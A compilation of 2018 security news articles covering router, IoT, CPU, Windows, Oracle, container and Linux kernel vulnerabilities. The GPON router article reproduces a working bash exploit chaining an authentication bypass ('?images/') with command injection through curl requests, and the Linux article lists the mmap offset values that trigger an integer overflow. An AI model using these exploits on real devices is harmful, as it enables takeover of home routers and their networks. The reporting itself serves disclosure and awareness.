The DZS ZNID-GPON-25xx and certain H640-series ONTs, including the software that introduced this vulnerability, were developed by an OEM supplier and resold by DZS. While designed and released more than 9 years ago, most of these products are now well past their sustainable service life. Because software support contracts are no longer offered for most of these products, we do not have direct insight to the total number of units that are still actively used in the field.

Resolution

DZS has informed all the customers who purchased these models of the vulnerability. We are working with each customer to help them assess methods to address the issue for units that may still be installed in the field. It will be up to the discretion of each customer to decide how to address the condition for their deployed equipment.


UPDATED – Critical RCE vulnerability found in over a million GPON Home Routers
8.5.2018 securityaffairs
Vulnerebility

Security researchers at VPNMentor conducted a comprehensive assessment on of a number of GPON home routers and discovered a Critical remote code vulnerability that could be exploited to gain full control over them.
The researchers have found a way to bypass the authentication to access the GPON home routers (CVE-2018-10561). The experts chained this authentication bypass flaw with another command injection vulnerability (CVE-2018-10562) and were able to execute commands on the device.

GPON Home Routers hack

Exploitation:
Analyzing the firmware of the GPON home routers, the experts found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could be chained to allow complete control of the vulnerable device and therefore the network. The first vulnerability exploits the authentication mechanism of the device, it could be exploited by an attacker to bypass all authentication.

The vulnerability effects the build in HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.

By appending

?images/ to the URL

the attacker can bypass the endpoint.

This works on both HTML pages and GponForm/

For instance, by inserting

/menu.html?images/

or
/GponForm/diag_FORM?images/

the experts were able to control the GPON Home Routers.

While looking through the device functionalities, the experts noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected using the host parameter.

“Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.” reads the analysis published by VPNMentor.

The experts included the following bash version of the exploit code:

#!/bin/bash

echo "[+] Sending the Command... "

“We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices” continues the post:

curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

GPON is a very popular passive optical network device that uses fiber-optics, these devices are provided by ISPs. In the video, you can see that over one million people use this type of network system router.

Below a video PoC published by the researchers:

“We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.” concluded the experts.

Recommendations:
Check if your router uses the GPON network.
Be aware that GPON routers can be hacked and exploited.
Talk to your ISP to see what they can do to fix the bug.
Warn your friends on Facebook (click here to share) and Twitter (click here to tweet).
Update May 08, 2018
The Italian security expert Federico Valentini (@f3d_0x0), ICT Security researcher at Cefriel, published a Python exploit for Remote Code Execution on GPON home routers (CVE-2018-10562).

The PoC code is available on GitHub:

https://github.com/f3d0x0/GPON


Logitech Patches Several Flaws in Harmony Hub
7.5.2018 securityweek
Vulnerebility

FireEye researchers have discovered several vulnerabilities in the Logitech Harmony Hub home control system. The vendor has released a firmware update that patches the flaws.

Logitech Harmony Hub allows users to control home entertainment and various other smart devices from an Android or iOS phone or tablet. Once initial pairing is done over Bluetooth, the Harmony app communicates with the Harmony hub using an HTTP-based API.

Researchers at FireEye have discovered several types of vulnerabilities that can be exploited by an attacker with access to the local network to take control of devices linked to the Hub and compromise other devices on the network.Logitech Harmony Hub vulnerabilities

The security firm believes the flaws could pose a serious risk considering that the Harmony Hub is used by some people to control smart locks and thermostats.

Logitech Harmony Hub vulnerabilities

Experts discovered four types of vulnerabilities that can be combined to gain root access to a device via SSH.

One of the security holes is related to the presence of debugging details in the production firmware image. Another flaw is related to improper SSL certificate validation during firmware updates. The firmware update process itself has also been found to be insecure, allowing an attacker to deliver a malicious update to the device.

Since no root password has been configured on the hub, an attacker could gain root access via SSH if they can somehow manage to enable the Dropbear SSH server. Enabling the server is possible by uploading specially crafted firmware using the previously described weakness.

Logitech was informed about the vulnerabilities in late January and patched them on April 10 with the release of firmware version 4.15.96. The vendor has advised customers to install the update and provided complete instructions on how to do so.

The company noted that the flaws affect its Harmony Hub-based products, which include Harmony Elite, Home Hub, Ultimate Hub, Home Control, Pro, Smart Control, Companion, Smart Keyboard, Ultimate, Ultimate Home, and harmony Hub.

“As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Due to the fact that the Harmony Hub, like many IoT devices, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack,” FireEye researchers explained.


Chrome freezes PC running Windows OS after Windows 10 April update
7.5.2018 securityaffairs
Vulnerebility

Some Chrome users are reporting freezes and timeouts after the installation of the Windows 10 April Update, let’s see what has happened
After the installation of Windows 10 April Update I observed continuous freezes while using the Chrome browser with one of my PCs, in some cases, I was not able to reach the websites I wanted to visit, apparently for connection problems.

I was reading some posts when I found a post written by Lawrence Abrams on Bleeping Computer that claims some Chrome users are reporting freezes and timeouts after the installation of the Windows 10 April Update.

“When these freezes occur, it turns the screen black and Windows becomes completely unresponsive until the user reboots the computer or restarts their graphic driver.” wrote Abrams.

The same problem was reported by many users that shared their experience in a Reddit post, some users have tried to update the video drivers or using differed Chrome versions without success.

Personally, I forced the sleep mode by pressing the power button on my laptop, then turning on again.

Lawrence explained that according to two tickets opened at Google, there are two distinct problems associated with the April 2018 Update (build 1803) and Chrome.

The freezing problems are the result of the crash of video driver and the problem may be related to a site that needs hardware acceleration. According to a bug ticket the issue affects Chrome version 66.0.3359.139 running on Windows 10, disabling hardware acceleration would fix the problem.

A second issue is associated with connections to SSL websites, according to a second ticket the problem could be a Registry permission problem with the Windows Cryptographic services (CryptoSvc).

Windows 10 April update

Microsoft has published a post to provide a temporary fix to the freezing problems.

˗ˏˋ Emanuel ˊˎ˗
@emannxx
Upgraded my work laptop to Windows 10 1803 and, guess what? Totally unusable, just like my personal laptop. Desktop kept freezing randomly when closing/switching UWP apps. Tired of trying to raise awareness for this. To hell with it. #WindowsInsiders

11:04 AM - May 3, 2018
1
See ˗ˏˋ Emanuel ˊˎ˗'s other Tweets
Twitter Ads info and privacy
“This Answers post advises users that they can use the Windows logo key + Ctrl + Shift + B keyboard combination to resolve the issue when their computer freezes. This keyboard combination causes the video driver to restart, which will cause the normal Windows screen to appear again.” added Abrams.
“Unfortunately, this just resolves the issue of the driver crashing, but does not actually resolve the problem and users will continue to see these black screens when the video driver crashes again.”
In my case, uninstalling the video driver and installing it again apparently solved the issue.


Spectre-NG – Researchers revealed 8 new varieties of the Spectre flaws
5.5.2018 securityaffairs
Vulnerebility

A group of security researchers has reportedly discovered 8 new varieties of the Spectre vulnerabilities, dubbed Spectre-Next Generation or Spectre-NG, that affect Intel CPUs.
A German security website reported that an unnamed team of researchers has discovered the new flaws that exploit the new issues reported in the original Spectre and Meltdown attacks.

The new eight Spectre-NG vulnerabilities in Intel CPUs also affect some ARM processors, at the time of writing the researchers only disclosed to the German computer magazine Heise the partial details of the vulnerabilities.

Intel has already acknowledged the Spectre-NG vulnerabilities and classified four of them as “high risk” and four as “medium.”

“Intel is already working on its own patches for Spectre-NG and developing others in cooperation with the operating system manufacturers. According to our information, Intel is planning two waves of patches. The first is scheduled to start in May; a second is currently planned for August.” reported the German computer magazine Heise.

“Knowing that Google Project Zero discovered one of the Spectre-NG flaws gives us an idea of when to expect the first patch.”

One of the flaws could be exploited by attackers with access to a virtual machine (VM) to take over the host system.

“One of the Spectre-NG flaws simplifies attacks across system boundaries to such an extent that we estimate the threat potential to be significantly higher than with Spectre. Specifically, an attacker could launch exploit code in a virtual machine (VM) and attack the host system from there – the server of a cloud hoster, for example.” continues the report.

“Alternatively, it could attack the VMs of other customers running on the same server. Passwords and secret keys for secure data transmission are highly sought-after targets on cloud systems and are acutely endangered by this gap.”

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Spectre attacks trigger the CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2) flaw, while Meltdown and Spectre Variant 1 can be addressed via software, the Spectre Variant 2 required an update of the microcode for the affected processors.

According to the German magazine, one of the Spectre-NG vulnerabilities was discovered by a white hat hacker at Google’s Project Zero that reported it to Intel 88 days ago.

If the vulnerability will be not fixed in a 90-day period according to the Google disclosure policy, the Project Zero team would possibly publicly share technical details of at least one flaw on May 7th (1 day before the Windows Patch Tuesday).

According to the magazine, there are signs that Microsoft is also preparing for CPU patches to release in the upcoming months.

The real problem is that this new wave of patches could have similar effects of the original ones in terms of performance and stability, we can only sit and wait for them.


Hackers Target Flaws Affecting a Million Internet-Exposed Routers
4.5.2018 securityweek 
Vulnerebility

Just a few days after they were disclosed, malicious actors started targeting a couple of flaws affecting routers made by South Korea-based Dasan Networks. There are roughly one million potentially vulnerable devices accessible directly from the Internet.

vpnMentor on Monday disclosed the details of two vulnerabilities in Gigabit-capable Passive Optical Network (GPON) routers made by Dasan and distributed to users by ISPs that provide fiber-optic Internet.

One of the flaws (CVE-2018-10561) allows a remote attacker to bypass a router’s authentication mechanism simply by appending the string “?images/” to a URL in the device’s web interface. The second vulnerability (CVE-2018-10562) can be exploited by an authenticated attacker to inject arbitrary commands.

Researchers warned that cybercriminals could combine the two security holes to remotely take control of vulnerable devices and possibly the victim’s entire network.

A Shodan search shows that there are roughly one million GPON home routers exposed to the Internet, a majority located in Mexico, Kazakhstan, and Vietnam.

The Network Security Research Lab at Chinese security firm Qihoo 360 reported on Thursday that it had already started seeing attempts to exploit CVE-2018-10561 and CVE-2018-10562. The company has promised to provide more details soon.

Hackers target Dasan router vulnerabilities

The fact that cybercriminals have started exploiting these vulnerabilities is not surprising considering that devices made by Dasan have been known to be targeted by botnets.

Researchers revealed in February that the Satori botnet had ensnared thousands of Dasan routers by exploiting a remote code execution vulnerability disclosed in December 2017 by Beyond Security, which claimed the vendor had ignored repeated attempts to report the issue.

vpnMentor said its attempts to report CVE-2018-10561 and CVE-2018-10562 to Dasan were also unsuccessful before its disclosure, but a representative of the manufacturer did reach out to the company after details of the security holes were made public.


Intel Working on Patches for 8 New Spectre-Like Flaws: Report
4.5.2018 securityweek 
Vulnerebility

Researchers have discovered a total of eight new Spectre-like vulnerabilities, including flaws that may be more serious and easier to exploit, according to German magazine c’t.

The flaws were reportedly identified by several research teams, including Google Project Zero, whose employees were among those who initially discovered the Meltdown and Spectre attack methods. C’t, which is owned by Heise, claims it has obtained the information exclusively and confirms the existence of the vulnerabilities and their severity.

The new vulnerabilities, dubbed “Spectre Next Generation” or “Spectre-NG,” are said to affect processors from Intel and at least some ARM chips. AMD processors are currently being analyzed to determine if they are impacted as well.

Intel has confirmed that it’s working on patching some vulnerabilities, but it has not provided any details. C’t reports that Intel will release updates in two waves – the first expected in May and the second in August.

There are currently two main versions of the Spectre vulnerability: variant 1 and variant 2. Variant 1 attacks can be mitigated using software updates, but variant 2 requires microcode updates as well. C’t says Microsoft is also working on mitigations, which indicates that the Spectre-NG flaws require both software and firmware updates.

Of the eight Spectre-NG flaws, four have been classified as high severity and four as medium severity, with CVE identifiers being prepared for each issue.

While the risk and attack scenarios are similar to the original Spectre, c’t says there is one exception. One of the flaws can be exploited to execute arbitrary code in virtual machines and compromise the host system, and the attack is relatively easy to conduct, especially compared to the original Spectre. Cloud service providers such as Cloudflare and Amazon are reportedly affected the most.

On the other hand, c’t reports that the Spectre-NG flaws are unlikely to be exploited at scale against personal and corporate computers.

“Assuming they prove to be legitimate, the group of vulnerabilities coined as ‘Spectre-NG’ may pose significantly higher risks to cloud operators and multi-tenant environments than the original variants of Spectre. The information provided to the German technology site Heise seems to imply that a few of the eight new vulnerabilities facilitate VM-escape mechanisms, allowing a threat actor to compromise the hypervisor and/or other tenants from their own VM, apparently with little-to-no effort,” Craig Dods, Chief Security Architect at Juniper Networks, told SecurityWeek.

“As a point of reference, Spectre v1/v2 were quite difficult to use for the purposes of VM-escape within cloud environments. The details that are available for ‘Spectre-NG’ hint that it’s incredibly easy to use, but we won’t know for sure until we can see what the actual problems are,” Dods added.

Satya Gupta, CTO and co-founder of Virsec, is not surprised that new variants of the Spectre attack have emerged.

“Now that the core vulnerabilities of speculative execution have been publicized, many well-funded hacking groups globally are racing to find new ways to exploit them. These are advanced attacks exploiting small, but repeatable flaws that skip important security controls in literally billions of processors,” Gupta said via email. “While not all applications will be vulnerable and some compensating controls will be effective, the attackers are relentless and will continuously search for cracks in other defenses that allow Spectre to be exploited.”

Several other side-channel attack methods have been identified since the disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime.


Meltdown patch made the headlines again, it can be bypassed in Windows 10
4.5.2018 securityaffairs
Vulnerebility

The problems with the mitigations for the Meltdown flaw continue a security researcher has demonstrated that the Meltdown patch in Windows 10 can be bypassed.
The Windows Internals expert Alex Ionescu discovered that a Meltdown patch issued for Windows 10 is affected by a severe vulnerability that could be exploited to bypass it.

“Calling NtCallEnclave returned back to user space with the full kernel page table directory, completely undermining the mitigation,” reads a tweet wrote on Twitter.

Alex Ionescu
@aionescu
Welp, it turns out the #Meltdown patches for Windows 10 had a fatal flaw: calling NtCallEnclave returned back to user space with the full kernel page table directory, completely undermining the mitigation. This is now patched on RS4 but not earlier builds -- no backport??

3:47 PM - May 2, 2018
514
338 people are talking about this
Twitter Ads info and privacy
Ionescu explained that Microsoft addressed the flaw with the release of the Windows 10 version 1803, also known as April 2018 Update.

Microsoft acknowledged the issue reported by the expert and is currently working to provide a fix to include in the Windows 10 version 1790 (Fall Creators Update) thta is the only version affected.

The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The Meltdown attack (CVE-2017-5754 vulnerability) could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

The good news is that Meltdown attacks are not easy to conduct and the risk of exploitation is considered low.

Meltdown patch

Unfortunately, the timeline for Meltdown patch is full of problems, the first release was promptly suspended by Microsoft in January due to instability issues observed for AMD processors

A week ago, the security researcher Ulf Frisk reported that some of Meltdown and Spectre security updated Windows introduces severe flaws.

He noticed that Meltdown and Spectre security updates released by Microsoft in January and February for Windows 7 and Windows Server 2008 R2 patch Meltdown are affected by a vulnerability that could be exploited by attackers to easily read from and write to memory.

According to the expert, an attacker can exfliltrate gigabytes of data per second by exploiting the vulnerability.


Meltdown Patch in Windows 10 Can Be Bypassed
4.5.2018 securityweek 
Vulnerebility

A researcher has discovered that a mitigation implemented by Microsoft in Windows 10 for the Meltdown vulnerability can be bypassed. The tech giant says it’s working on an update.

According to Windows internals expert Alex Ionescu, a Meltdown mitigation in Windows 10 has what he describes as “a fatal flaw.”

“Calling NtCallEnclave returned back to user space with the full kernel page table directory, completely undermining the mitigation,” Ionescu wrote on Twitter.

Meltdown mitigation in Windows 10 bypassed

The researcher said Microsoft included a patch for this issue in the recently released Windows 10 version 1803, also known as April 2018 Update, Redstone 4 and RS4.

Microsoft told SecurityWeek that the company is working on providing an update for Windows 10 version 1790, also known as the Fall Creators Update, which appears to be the only version affected.

While the Meltdown mitigation bypass is interesting from a research perspective, exploitation requires local code execution privileges and the risk of malicious attacks is low.

The patches released by Microsoft for the Meltdown vulnerability have caused problems from day one. Shortly after the Meltdown and Spectre flaws were disclosed in early January, users started complaining that Microsoft’s updates had been causing Windows to break down on computers with AMD processors.

More recently, a researcher discovered that Meltdown mitigations for Windows 7 and Windows Server 2008 R2 introduced a serious privilege escalation vulnerability that may be worse than Meltdown.


MassMiner Attacks Web Servers With Multiple Exploits
4.5.2018 securityweek 
Exploit  Vulnerebility

A recently discovered crypto-currency mining malware family is using multiple exploits in an attempt to increase its chances of successfully compromising web servers, AlienVault has discovered.

Dubbed MassMiner, the malware includes a fork of internet scanning tool MassScan, which in this case passes a list of private and public IP ranges to scan during execution. After compromising a target, the malware first attempts to spread to other hosts on the local network, and then attempts propagation over the Internet.

AlienVault observed multiple versions of MassMiner and says the malware continues to spread. The security firm identified compromised systems in Asia, Latin America, and Europe, but hasn’t established yet the full extent of the infection.

After leveraging MassScan for reconnaissance, the malware attempts to exploit vulnerable systems using the CVE-2017-10271 WebServer Exploit, the CVE-2017-0143 NSA-linked SMB Exploit (EternalBlue, used to install DoublePulsar), and the CVE-2017-5638 Apache Struts Exploit. It also attempts to brute force Microsoft SQL Servers using SQLck.

Once a Microsoft SQL server has been compromised, a script that installs MassMiner is executed, followed by a 1000+ line SQL script that disables important security features on the server, such as anti-virus protections.

On the Weblogic servers, the MassMiner malware is downloaded using a PowerShell script, and a VisualBasic script deploys the malware onto Apache Struts servers.

After being deployed, the malware achieves persistence, schedules tasks to execute its components, modifies access control list (ACL) to grant full access to certain files in the system, and kills the Windows Firewall.

MassMiner downloads a configuration file from a remote server. This file contains information on the server to download updates from, the executable to infect other machines with, and the Monero wallet and mining pool to send mined currency to.

“However, if the http request for the config file is never responded, the malware is capable of successfully running the Miner with its default configuration,” Alien Vault notes.

In addition to the crypto-miner, the malware also attempts to install the classic Gh0st backdoor onto the infected machines. This suggests that the malware operators might be setting up for further attacks, the same as the recently detailed PyRoMine malware did.

AlienVault has identified two Monero wallets belonging to the MassMiner operators.


CVE-2018-2879 – Vulnerability in Oracle Access Manager can let attackers impersonate any user account
4.5.2018 securityaffairs
Vulnerebility

Security researchers have discovered a security vulnerability in Oracle Access Manager that can be exploited by a remote attacker to bypass the authentication and take over the account of any user.
Security researcher Wolfgang Ettlinger from SEC Consult Vulnerability Lab has discovered a security vulnerability in Oracle Access Manager that can be exploited by a remote attacker to bypass the authentication and take over the account of any user or administrator on affected systems.

Oracle Access Management provides Web SSO with MFA, coarse-grained authorization and session management, and standard SAML Federation and OAuth capabilities to enable secure access to mobile applications and external cloud.

The flaw, tracked as CVE-2018-2879, relates a flawed cryptographic format used by the Oracle Access Manager.

“The Oracle Access Manager is the component of the Oracle Fusion Middleware that handles authentication for all sorts of web applications,” SEC Consult researcher Wolfgang Ettlinger explained.

“we will demonstrate how minor peculiarities of the cryptographic implementation had a real-life impact on the security of the product. By exploiting this vulnerability we were able to fabricate arbitrary authentication tokens, allowing us to impersonate any user and effectively break the main functionality of OAM.”

Ettlinger explained that an attacker can exploit a vulnerability in the way OAM handles encrypted messages to trick the software into accidentally disclosing information that can be used to log in impersonating other users.

The attacker can power a padding oracle attack to disclose an account’s authorization cookie, he can create a script that generates valid login keys for any desired user, including administrators.

“During a research project, we found that a cryptographic format used by the OAM exhibits a serious flaw. By exploiting this vulnerability, we were able to craft a session token. When a WebGate is presented with this token, it would accept it as a legitimate form of authentication and allow us to access protected resources.” explained the expert.

“What’s more, the session cookie crafting process lets us create a session cookie for an arbitrary username, thus allowing us to impersonate any user known to the OAM.”

The following video PoC shows that an attacker can impersonate arbitrary users by triggering the flaw.

Oracle Access Management 11g and 12c versions were both affected by the vulnerability. The experts used a simple Google Dork to find about 11.800 OAM installs, some of them belonging to high-profile organizations (including Oracle). We have to consider the there are many other installations that are not reachable from the Internet.

Oracle Access Manager

The experts responsibly disclosed this flaw to Oracle in November 2017. the IT giant addressed it with the latest Critical Patch Update (CPU) in April 2018.

“As this patch was provided in Oracle’s regular update schedule, we expect OAM administrators to have applied the patch by now. If this is not the case for your organization, it’s high time to do so now” continues the advisory.

Technical details about the CVE-2018-2879 are included in the security advisory published by the SEC Consult Cryptography Competence Center.


Microsoft Patches Critical Flaw in Open Source Container Library
4.5.2018 securityweek 
Vulnerebility

Microsoft informed users on Wednesday that an update for the Windows Host Compute Service Shim library patches a critical remote code execution vulnerability.

Introduced in January 2017, the Windows Host Compute Service (HCS) is a low level container management API for Microsoft’s Hyper-V hypervisor. The tech giant has made available two open source wrappers that allow users to call the HCS from higher level programming languages instead of the C API directly.

One of these wrappers is the Windows Host Compute Service Shim (hcsshim), which supports launching Windows Server containers from the Go language. Hcsshim is mainly used in the Docker Engine project, but Microsoft says it can be freely used by others as well.

Swiss developer and security researcher Michael Hanselmann discovered that hcsshim fails to properly validate input when importing a container image, allowing a malicious actor to remotely execute arbitrary code on the host operating system.

“To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host,” Microsoft said in its advisory.

The vulnerability, tracked as CVE-2018-8115, has been classified as critical, but Microsoft believes it is unlikely to be exploited for malicious purposes. Technical details of the issue have not been made public.

The flaw has been fixed with the release of hcsshim 0.6.10, which can be obtained from GitHub. US-CERT has also released an alert advising users to apply the update.

This is not the only out-of-band update released by Microsoft recently. Last month, the company updated its Malware Protection Engine to patch a vulnerability that can be exploited to take control of a system by placing a malicious file in a location where it would be scanned.

UPDATE. Hanselmann says he reported the vulnerability to both Microsoft and Docker in February. The researcher will release technical details and a proof-of-concept (PoC) exploit on May 9.


Over a Million Dasan Routers Vulnerable to Remote Hacking
4.5.2018 securityweek 
Vulnerebility

Researchers have disclosed the details of two unpatched vulnerabilities that expose more than one million home routers made by South Korea-based Dasan Networks to remote hacker attacks.

In a blog post published on Monday, vpnMentor revealed that many Gigabit-capable Passive Optical Network (GPON) routers, which are used to provide fiber-optic Internet, are affected by critical vulnerabilities. The company told SecurityWeek that the impacted devices are made by Dasan Networks.

One of the flaws, tracked as CVE-2018-10561, allows a remote attacker to bypass a router’s authentication mechanism simply by appending the string “?images/” to a URL in the device’s web interface.

The second vulnerability, identified as CVE-2018-10562, allows an authenticated attacker to inject arbitrary commands.

By combining the two security holes, a remote and unauthenticated attacker can take complete control of a vulnerable device and possibly the entire network, vpnMentor said. The company has published a video showing how the attack works:

A Shodan search shows that there are more than one million GPON home routers exposed to the Internet, a majority located in Mexico (480,000), Kazakhstan (390,000), and Vietnam (145,000).

“Depending on what the attacker wants to achieve, he can be spying on the user and any connected device (TV, phones, PC and even speakers like Amazon Echo). Also he can inject malware into the browser which means even when you leave your home network your device would be hacked now,” Ariel Hochstadt, co-founder of vpnMentor, told SecurityWeek. “If the hacker is resourceful (government etc) he can enable advanced spear phishing attacks, and even route criminal activities through exploited routers (Imagine the FBI knocks on your door telling you they saw someone in your house using your IP address and selling stolen credit card numbers on the dark web).”

vpnMentor said it did try to report its findings to Dasan before making any information public, but it did not receive a response. Dasan representatives, specifically a PR agency, reached out to vpnMentor on LinkedIn after its blog post was published.

While in some cases Dasan has shown interest in working with researchers who discovered vulnerabilities in its products, there are some advisories online describing potentially critical issues that the vendor has apparently ignored.

Malicious actors have been known to target Dasan devices. Researchers reported recently that the Satori botnet had ensnared thousands of Dasan routers by exploiting a remote code execution vulnerability. The flaw in question was disclosed in December 2017 by Beyond Security, which claimed the vendor had ignored repeated attempts to report the issue.

This is not the first time vpnMentor reports finding vulnerabilities in network devices. Last month, the company disclosed the details of an unpatched command injection vulnerability that can be exploited to take control of network-attached storage (NAS) devices from LG.


Microsoft addressed critical flaw in Windows Host Compute Service Shim library
3.5.2018 securityaffairs
Vulnerebility

Microsoft released an out of band update to address a critical remote code execution vulnerability in the Windows Host Compute Service Shim library (hcsshim).
Microsoft announced that it has issued a security update to address a critical remote code execution vulnerability in the Windows Host Compute Service Shim library (hcsshim).

The Windows Host Compute Service (HCS) is a low-level container management API in Hyper-V, Microsoft implemented two open source wrappers to invoke HCS functions using higher level programming languages.

The Windows Host Compute Service Shim wrapper, introduced in January 2017, allows the launch of Windows Server containers from the Go language.

“We’ve released two wrappers thus far. One is written in Go (and used by Docker), and the other is written in C#.” reads a blog post published by Microsoft.

“You can find the wrappers here:

https://github.com/microsoft/dotnet-computevirtualization
https://github.com/microsoft/hcsshim“
The security expert Michael Hanselmann discovered that hcsshim fails to properly validate input when importing a container image, the vulnerability, tracked as CVE-2018-8115, could be exploited by a remote attacker to execute arbitrary code on the host operating system.

“A remote code execution vulnerability exists when the Windows Host Compute Service Shim (hcsshim) library fails to properly validate input while importing a container image.” reads the security advisory published by Microsoft.

“To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host.”

Windows Host Compute Service Shim library

While US-CERT has released an alert urging to update the library, Microsoft tried to downplay the problem explaining that it is unlikely that the flaw could be exploited in attacks in the wild.

Microsoft addressed the vulnerability with the out-of-band update hcsshim 0.6.10 that is available on GitHub.


Privilege Escalation Bug Lurked in Linux Kernel for 8 Years
2.5.2018 securityweek
Vulnerebility

A security vulnerability in a driver leading to local privilege escalation in the latest Linux Kernel version was introduced 8 years ago, Check Point reveals.

The security flaw provides a local user with access to a vulnerable privileged driver with the possibility to read from and write to sensitive kernel memory. Tracked as CVE 2018-8781, the vulnerability could be exploited to escalate local privileges, Check Point's researchers say.

The bug impacts the internal mmap() function defined in the fb_helper file operations of the “udl” driver of “DisplayLink” and was discovered using a simple search.

Because drivers commonly implement their own version of file operation functions, they are prone to implementation errors, and the discovery of this vulnerability is proof of that.

In fact, there are various common vulnerabilities impacting drivers where the mmap() handler is used, such as lack of input validations and Integer-Overflows.

A classic driver, the researchers explain, holds an internal buffer representing the shared memory region with the peripheral device, and should only let the user access memory ranges inside this buffer.

The prototype of the mmap() function includes numerous fields that an attacker can control and developers should perform a series of checks and to avoid possible Integer-Overflows to eliminate issues.

According to Check Point, there are three checks that should be performed: Region start: 0 <= offset < buffer’s end; Region end: buffer’s start <= offset + length <= buffer’s end; and Region start <= Region End.

“In actual fact, the last check can be spared since the Linux kernel will sanitize the supplied length, making it practically impossible to pass the first two checks while still passing the third check,” Check Point says.

The researchers discovered the security flaw while taking a closer look at remap_pfn_range(), a function of high importance, because it maps physical memory pages to the user.

“The video/drm module in the kernel defines a default mmap() wrapper that calls that real mmap() handler defined by the specific driver,” the security researchers note.

The bug is a classic example for an Integer-Overflow: there’s an unsigned offset, thus the first check is skipped, and the calculation “offset + size,” however, can bypass the second check while still using an illegal “offset” value.

As there are only 48 bits of accessible memory on 64-bit machines, the use of a huge “offset” to bypass the check requires making sure that “info->fix.smem_start + offset” will wrap-around to a valid mappable physical address, Check Point also notes.

The vulnerability was verified on an Ubuntu 64-bit virtual machine where a simulated vulnerable driver was uploaded. The driver’s mmap() handler included the implementation to check in each test.

Two consecutive calls to mmap() on the vulnerable driver were made by user-mode code, namely a sanity check and a vulnerability check.

Setting the buffer’s address at the page-aligned physical address of the kernel’s /dev/urandom implementation results in the output providing the correct physical page and the previous physical page, respectively.

Additional checks revealed that it is possible for the user to read and write from/to the mapped pages. Thus, an attacker could eventually trigger code execution in kernel space, the researchers explain.

“While the vulnerability was found using a simple search, it was introduced to the kernel eight years ago. This fact can teach us that even on a popular open source project as the Linux Kernel, you could always hope to find vulnerabilities if you know where to search,” Check Point concludes.

The vulnerability was disclosed to the Linux Kernel on March 18 and a patch was issued the same day. After the patch was verified, the official Linux patch was issued for CVE 2018-8781 on March 21 and was integrated to the Linux Kernel the same day.


CVE 2018-8781 Privilege Escalation flaw was introduced in Linux Kernel 8 years ago
2.5.2018 securityaffairs
Vulnerebility

Researchers from security firm Check Point discovered a security vulnerability in a driver in the Linux kernel, tracked as CVE 2018-8781, that leads to local privilege escalation.
The CVE 2018-8781 flaw, introduced 8 years ago, could be exploited by a local user with access to a vulnerable privileged driver to escalate local privileges and read from and write to sensitive kernel memory.

Experts explained that it is common for drivers to implement their own version of file operation functions, this is visible by analyzing the file_operations struct of a driver.

Such kind of implementations could introduce flaws such as Integer-Overflows and the lack of input validations.

TheCVE 2018-8781 flaw revealed by CheckPoint affects the internal mmap() function defined in the fb_helper file operations of the “udl” driver of “DisplayLink.”

” A classic driver should probably look like this:

The driver will hold an internal buffer that represents the shared memory region with the peripheral device.
The driver should only let the user access memory ranges that fall inside this buffer.” states the analysis published by CheckPoint.
The prototype of the mmap() function from user-space confirms the presence of numerous fields that could be used by the attacker to potentially trigger the vulnerabilities.


According to the experts, developers should perform at least the following checks to avoid possible Integer-Overflows:

Region start: 0 <= offset < buffer’s end
Region end: buffer’s start <= offset + length <= buffer’s end
Region start <= Region End
“In actual fact, the last check can be spared since the Linux kernel will sanitize the supplied length, making it practically impossible to pass the first two checks while still passing the third check,” continues Check Point.

The experts discovered the CVE 2018-8781 vulnerability while analyzing a function that maps physical memory pages to the user, the remap_pfn_range().

The experts searched for all the modules using the remap_pfn_range function (GREP for “remap_pfn_range) and contained 158 results, then filtering for drivers the list was restricted to six possible candidates.

“The video/drm module in the kernel defines a default mmap() wrapper that calls that real mmap()handler defined by the specific driver. In our case the vulnerability is in the internal mmap() defined in the fb_helper file operations of the “udl” driver of “DisplayLink”.” discovered the researchers.

In this way, the researchers spotted an Integer-Overflow in the driver.

“This is a classic example for an Integer-Overflow. Since offset is unsigned the programmer skipped check #1 and went directly to check #2. However, the calculation “offset + size” could wrap-around to a low value, allowing us to bypass the check while still using an illegal “offset” value.” continues

“on 64 bit machines there are only 48 bits of accessible memory, meaning that if we use a huge “offset” to bypass this check we will also have to make sure that “info->fix.smem_start + offset” will wrap-around to a valid mapable physical address.”

The experts verified the flaw on an Ubuntu 64-bit virtual machine using a simulated vulnerable driver. The driver’s mmap() handler contained the implementation to check in each test performed by the researchers.

The user-mode code preformed 2 consecutive calls to mmap() on the vulnerable driver:

length = 0x1000, offset = 0x0 -> sanity check
length = 0x1000, offset = 0xFFFFFFFFFFFFFFFF – 0x1000 + 1 -> vulnerability check
Setting the buffer’s address at the page-aligned physical address of the kernel’s /dev/urandom implementation results were the expected ones.

